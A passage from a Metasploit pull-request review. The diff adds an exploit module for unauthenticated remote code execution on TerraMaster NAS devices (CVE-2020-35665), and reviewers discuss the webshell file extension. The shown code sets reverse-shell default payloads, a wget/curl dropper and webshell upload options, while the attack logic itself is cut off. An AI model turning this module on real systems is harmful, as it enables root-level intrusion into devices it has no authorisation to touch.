modules/exploits/linux/http/terramaster_unauth_rce_cve_2020_35665.rb

```diff
@@ -0,0 +1,212 @@
+          during CSV creation.
+          Any unauthenticated user can therefore execute commands on the system under the same privileges as the
+          web application, which typically runs under root at the TerraMaster Operating System.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'IHTeam' # Discovery
+        ],
+        'References' => [
+          ['CVE', '2020-35665'],
+          ['CVE', '2020-28188'],
+          ['PACKETSTORM', '160685'],
+          ['PACKETSTORM', '160687'],
+          ['URL', 'https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/'],
+          ['URL', 'https://attackerkb.com/topics/lXY4yjOvwx/cve-2020-35665']
+        ],
+        'DisclosureDate' => '2020-12-12',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['printf', 'echo', 'bourne', 'wget', 'curl'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8181,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/']),
+      OptString.new('WEBSHELL', [false, 'Web shell name with extension .php. Name will be randomly generated if left unset.', nil]),
+      OptEnum.new('COMMAND',
+                  [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])
+    ])
+  end
+
+  def upload_webshell
+    # randomize file name and extension if option WEBSHELL is not set
+    file_ext = %w[php]
```

Comment:
Are there any more file extensions that are valid? If not, there's no need for an array

Reply:
No, only the `.php` extension works. Reused this code from one of my other modules, but I agree with your suggestion to make it fixed.

Reply:
See https://github.com/rapid7/metasploit-framework/pull/18063/commits/b3b0cb4ccf5db3939d0e855d84b8037305756a0e